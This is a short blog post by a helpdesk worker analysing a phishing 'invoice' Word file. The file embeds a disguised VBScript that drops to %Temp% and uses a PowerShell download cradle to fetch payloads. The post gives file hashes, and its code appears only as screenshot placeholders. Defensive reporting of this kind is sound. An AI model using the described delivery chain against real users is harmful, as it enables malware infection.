Packager Shell Object being used as Infection Vector

Today, something interesting came across my desk. A user forwarded me an email that claimed to be an invoice and attached to it was a word document. At first, I was excited to take a look at another malicious office macro. When I opened the document, I was kind of let down. All I saw was an embedded Excel file:

1

 

Looking at the properties of that file, I quickly noticed that it wasn’t an excel file at all. When you double click on that file, you will notice that a VBScript file gets dropped into AppData\Local\Temp.

2

 

When I opened the VBScript file, this is what I saw:

5

I should note that I do not do malware analysis nor do I work in a full fledged security job. I just work the helpdesk. Since I have other stuff to do, I took a shortcut when analyzing this code. The part I was interested in is the “CreateObject” portion at the top. I set the first portion of that line to a variable and echoed it back:

6

Here is the result:

7

I did the same for the “run” portion of the “CreateObject” line:

8

And the result:

9

 

It appears that the attackers are disguising VBScript files as Excel files. When you double-click on the embedded file, it saves the VBScript file to %Temp% and runs. It then uses the well-known Powershell Cradle to fetch the payloads.

 

Just another interesting way attackers are combining and using Microsoft Office, VBScript and Powershell as an infection vector.

The SHA256 of the initial document is here: 9e73ab4798b8fb49645e2cbb54d6e85e396ef14feb43b5f53d555e92274e92aa

 

The SHA265 of the VBScript file is here:

b9b4d926ad3396440f775300960396429c102a0aac18da5733b47449ad4bf801

 

-Matt N. (@enigma0x3)

5 thoughts on “Packager Shell Object being used as Infection Vector

  1. Very nice investigation, but if you upload and check the file on the VirusTotal he has Detection ratio: 24/57 instead of 1/57 from the hash that you mention on your article. What did it changed on it?

    Thanks

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s